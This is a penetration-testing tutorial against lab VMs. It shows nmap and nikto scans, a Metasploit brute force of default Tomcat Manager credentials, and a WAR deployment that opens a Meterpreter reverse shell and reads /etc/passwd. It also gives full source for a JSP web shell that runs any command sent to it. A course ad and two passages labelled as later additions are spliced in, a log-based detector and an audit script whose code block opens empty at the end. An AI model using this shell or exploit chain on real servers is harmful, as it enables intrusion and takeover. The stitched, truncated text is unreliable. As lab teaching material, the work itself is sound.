This tutorial describes the basic principles of gathering information in order to exploit vulnerable machines, here an Ubuntu Server and a Windows XP host. Both systems have vulnerable services installed, such as Apache Tomcat (Java) and the Samba file server, and vulnerable databases: PostgreSQL on the Ubuntu machine and MySQL on the Windows machine respectively.

This tutorial outlines the basic steps for finding and exploiting the security flaws on both machines:

  • Gathering information
  • Identifying open network services
  • Exploiting vulnerable services

(Note: For the purpose of this tutorial, BackBox (based on Ubuntu) is used as the attacking OS, together with the latest installation package of Oracle VM VirtualBox, and Ubuntu 9.04 / Windows XP SP2 as the target OSs.)

Setting Up VM – Manual ifconfig

Before starting our penetration testing on the VMs, we'll set up and configure a couple of things in the VM settings. After creating both OS machines (Ubuntu and Windows), click the "Settings" button and navigate to the "Network" tab once more. For the network adapter, choose "Host-only Adapter"; the vboxnet0 interface will be selected automatically.

Next we’ll set up the eth0 interface for Ubuntu OS. On the terminal type:

ifconfig eth0 192.168.56.102 netmask 255.255.255.0 up

If you would like the network information assigned statically, without having to enter it manually each time, edit the /etc/network/interfaces file for the appropriate Ethernet device:

# The host-only network interface
auto eth0
iface eth0 inet static
address 192.168.56.102
netmask 255.255.255.0
network 192.168.56.0
broadcast 192.168.56.255

(Note: Be sure to restart the network service after modifying this file (/etc/init.d/networking restart).)

Next you will set up the Windows network interface. In the Run dialog, type cmd and click "OK".

Then navigate to the Network Connections panel.

Want to learn more?? The InfoSec Institute Ethical Hacking course goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises. While these hacking skills can be used for malicious purposes, this class teaches you how to use the same hacking techniques to perform a white-hat, ethical hack, on your organization. You leave with the ability to quantitatively assess and measure threats to information assets; and discover where your organization is most vulnerable to black hat hackers. Some features of this course include:

  • Dual Certification - CEH and CPT
  • 5 days of Intensive Hands-On Labs
  • Expert Instruction
  • CTF exercises in the evening
  • Most up-to-date proprietary courseware available

Next, in the properties panel choose "Internet Protocol (TCP/IP)" and click "Properties". On the "General" tab select "Use the following IP address" and enter the appropriate network information.

Next, at the command prompt, run the following command to verify the adapter settings:

ipconfig /all

Verifying connectivity

We will ping the machines to verify connectivity. If everything is configured correctly, you should see output along the lines of the following:

Ubuntu Machine:

root@wizard32:~# ping 192.168.56.102
PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data.
64 bytes from 192.168.56.102: icmp_req=1 ttl=64 time=0.302 ms
64 bytes from 192.168.56.102: icmp_req=2 ttl=64 time=0.754 ms
^C
--- 192.168.56.102 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.302/0.528/0.754/0.226 ms

And

root@ubuntu:~$ ping 192.168.56.1
PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data.
64 bytes from 192.168.56.1: icmp_req=1 ttl=64 time=0.251 ms
64 bytes from 192.168.56.1: icmp_req=2 ttl=64 time=0.306 ms
^C
--- 192.168.56.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.251/0.278/0.306/0.032 ms

Windows Machine:

root@wizard32:~# ping 192.168.56.103
PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.
64 bytes from 192.168.56.103: icmp_req=1 ttl=128 time=0.536 ms
64 bytes from 192.168.56.103: icmp_req=2 ttl=128 time=0.574 ms
^C
--- 192.168.56.103 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 0.536/0.555/0.574/0.019 ms

And

C:\Documents and Settings\windowsxp>ping 192.168.56.1
Pinging 192.168.56.1 with 32 bytes of data:
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.56.1
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Gathering Information – Ubuntu Machine

We'll begin with some basic scans against our Ubuntu VM at 192.168.56.102. First, a simple scan to determine which TCP ports are open on the target, using the -p- option (all 65535 ports):

root@wizard32:~# nmap -p- 192.168.56.102
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 13:54 EEST
Nmap scan report for 192.168.56.102
Host is up (0.00020s latency).
Not shown: 65522 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:08:F3:66 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds

Looking at the results, we can see that there are many open ports. Let's use another tool to learn a little more about the service on port 8180:

root@wizard32:~# nikto -h 192.168.56.102 -p 8180
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        8180
+ Start Time:         2013-06-19 14:04:00
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /: Appears to be a default Apache Tomcat install.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
+ OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3092: /webdav/index.html: WebDAV support is enabled.
+ OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation.
+ /admin/account.html: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ 6448 items checked: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2013-06-19 14:05:24 (84 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Exploit Vulnerable Backdoors

Reviewing the Nikto output closely, we can see that port 8180/tcp runs an Apache Tomcat server. We can identify the Tomcat version using Metasploit:

msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options
Module options (auxiliary/admin/http/tomcat_administration):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        Use a proxy chain
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        8180             yes       The target port
   THREADS      1                yes       The number of concurrent threads
   TOMCAT_PASS                   no        The password for the specified username
   TOMCAT_USER                   no        The username to authenticate as
   VHOST                         no        HTTP server virtual host
msf auxiliary(tomcat_administration) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_administration) > run
[*] http://192.168.56.102:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, Apache Tomcat/5.5 is in use. So, once more using Metasploit, we'll try to log in to the Tomcat Manager with a list of default username/password combinations:

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > run
[*] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - Trying username:'' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - Trying username:'admin' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - Trying username:'manager' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - Trying username:'role1' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - Trying username:'root' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - Trying username:'tomcat' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - Trying username:'both' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - Trying username:'j2deployer' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - Trying username:'ovwebusr' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - Trying username:'cxsdk' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - Trying username:'ADMIN' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - Trying username:'xampp' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - Trying username:'admin' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - Trying username:'manager' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - Trying username:'role1' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - Trying username:'root' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [17/63] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.56.102:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - Trying username:'both' with password:'both'
[-] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - Trying username:'j2deployer' with password:'j2deployer'
[-] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - Trying username:'cxsdk' with password:'cxsdk'
[-] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - Trying username:'ADMIN' with password:'ADMIN'
[-] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - Trying username:'xampp' with password:'xampp'
[-] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - Trying username:'root' with password:'owaspbwa'
[-] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - Trying username:'' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - Trying username:'' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - Trying username:'' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - Trying username:'' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - Trying username:'' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - Trying username:'' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - Trying username:'admin' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - Trying username:'admin' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - Trying username:'admin' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - Trying username:'admin' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - Trying username:'admin' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - Trying username:'manager' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - Trying username:'manager' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - Trying username:'manager' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - Trying username:'manager' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - Trying username:'manager' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - Trying username:'role1' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - Trying username:'role1' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - Trying username:'role1' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - Trying username:'role1' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - Trying username:'role1' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - Trying username:'root' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - Trying username:'root' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - Trying username:'root' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - Trying username:'root' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - Trying username:'root' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - Trying username:'both' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - Trying username:'both' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - Trying username:'both' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - Trying username:'both' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - Trying username:'both' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - Trying username:'both' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Reviewing the result, we can see that the Tomcat Manager accepts "tomcat" as both username and password, so let's use those credentials to exploit it:

msf> use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6471 bytes as DqyPmto6a9UzwBp3l1AUIFIT.war ...
[*] Executing /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp...
[*] Undeploying DqyPmto6a9UzwBp3l1AUIFIT ...
[*] Sending stage (30246 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:51208) at 2013-06-18 15:30:53 +0300

meterpreter > getuid
Server username: tomcat55
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
cd /etc
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
::
:
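From the defender's side, the 63 login attempts above and the deploy/undeploy that follows leave a distinctive trail in Tomcat's access log. The following Python script is an added example, not part of the original tutorial; it assumes Tomcat's common access-log format, and the sample lines it contains are constructed to mirror the activity shown above.

```python
"""Detect Tomcat Manager credential guessing and WAR deployment in access logs.

This is an added defender-side example, not code from the original tutorial.
It assumes the Tomcat AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b)
and that log lines arrive in chronological order.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
DEPLOY_RE = re.compile(r"^/manager/(deploy|undeploy)(\?|$)")

# Constructed sample log: twelve wrong guesses against /manager/html, one
# success, then deploy/undeploy of a randomly named application, mirroring
# the activity the Metasploit modules above generate on the server side.
SAMPLE_LOG = [
    f'192.168.56.1 - - [18/Jun/2013:15:29:{s:02d} +0300] "GET /manager/html HTTP/1.1" 401 2486'
    for s in range(12)
] + [
    '192.168.56.1 - tomcat [18/Jun/2013:15:29:12 +0300] "GET /manager/html HTTP/1.1" 200 10521',
    '192.168.56.1 - tomcat [18/Jun/2013:15:30:50 +0300] "PUT /manager/deploy?path=/DqyPmto6a9UzwBp3l1AUIFIT HTTP/1.1" 200 71',
    '192.168.56.1 - - [18/Jun/2013:15:30:51 +0300] "GET /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp HTTP/1.1" 200 0',
    '192.168.56.1 - tomcat [18/Jun/2013:15:30:53 +0300] "GET /manager/undeploy?path=/DqyPmto6a9UzwBp3l1AUIFIT HTTP/1.1" 200 68',
    '192.168.56.50 - - [18/Jun/2013:15:31:00 +0300] "GET /tomcat-docs/index.html HTTP/1.1" 200 6000',
]


def parse_access_line(line):
    """Parse one common-format access log line; return None for anything else."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_manager_abuse(lines, threshold=10, window_s=60):
    """Return a list of (client_ip, message) alerts for /manager activity.

    Rule 1: >= threshold 401s from one client within window_s seconds
            -> credential guessing.
    Rule 2: a 200 on /manager/html from a client that tripped rule 1
            -> a guessed password probably worked.
    Rule 3: any deploy/undeploy request -> deployment to verify against
            change records (Metasploit deploys a random-named WAR and
            undeploys it seconds later, leaving only the log behind).
    """
    alerts = []
    failures = defaultdict(list)  # client ip -> timestamps of recent 401s
    flagged = set()
    for line in lines:
        rec = parse_access_line(line)
        if rec is None or not rec["path"].startswith("/manager"):
            continue
        ip, ts, path = rec["ip"], rec["ts"], rec["path"]
        if rec["status"] == 401:
            recent = failures[ip]
            recent.append(ts)
            while (ts - recent[0]).total_seconds() > window_s:
                recent.pop(0)  # slide the window forward
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, f"credential guessing: {len(recent)} x 401 on "
                                   f"/manager within {window_s}s"))
        elif rec["status"] == 200:
            if ip in flagged and path.startswith("/manager/html"):
                alerts.append((ip, "successful manager login after guessing "
                                   f"burst as user {rec['user']}"))
            if DEPLOY_RE.match(path):
                alerts.append((ip, f"{rec['method']} {path} by {rec['user']}: "
                                   "verify this deployment was authorized"))
    return alerts


if __name__ == "__main__":
    for ip, msg in detect_manager_abuse(SAMPLE_LOG):
        print(f"[ALERT] {ip}: {msg}")
```

Run against a real localhost_access_log the same rules fire on the guessing burst, the first 200 after it, and the manager deploy/undeploy pair, which is what to look for after a suspected compromise.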

Vulnerable Web Service

Open a browser and enter the IP address of the VM followed by the Tomcat port (IP:Port) in the address bar.

Next, click "Tomcat Manager" in the Administration panel on the left and enter "tomcat" as both username and password.

Next we'll create and upload a .war file containing a JSP that executes arbitrary commands on the server. Create a cmd_shell.jsp file with the following code:

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML>
<TITLE>JSP Shell</TITLE>
<BODY>
Note: Against Windows you may need to prefix your command with cmd.exe /c
</br></br>
JSP Command:
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Execute">
</FORM>
<PRE>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</PRE>
</BODY>
</HTML>

Then package the file into a .war archive using the jar command as follows:

jar -cvf cmd.war cmd_shell.jsp

(Note: .war is the file type accepted for deployment by the Apache Tomcat Manager.)

Next, browse to the .war file and deploy it. As we can see, the /cmd path has been added to the list of applications.

Click this path, then complete the URL in the address bar by appending cmd_shell.jsp:

At this point we can run any Unix/Windows command, as if from a command prompt window.
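Both weaknesses exploited in this section, a manager account protected by the "tomcat" default password and a deployed JSP that passes a request parameter to Runtime.exec, can be caught with a local audit. The following Python script is an added example, not part of the original tutorial or of Tomcat itself; it assumes the Tomcat 5.5 tomcat-users.xml layout, and the tomcat-users.xml and JSP samples it contains are constructed.

```python
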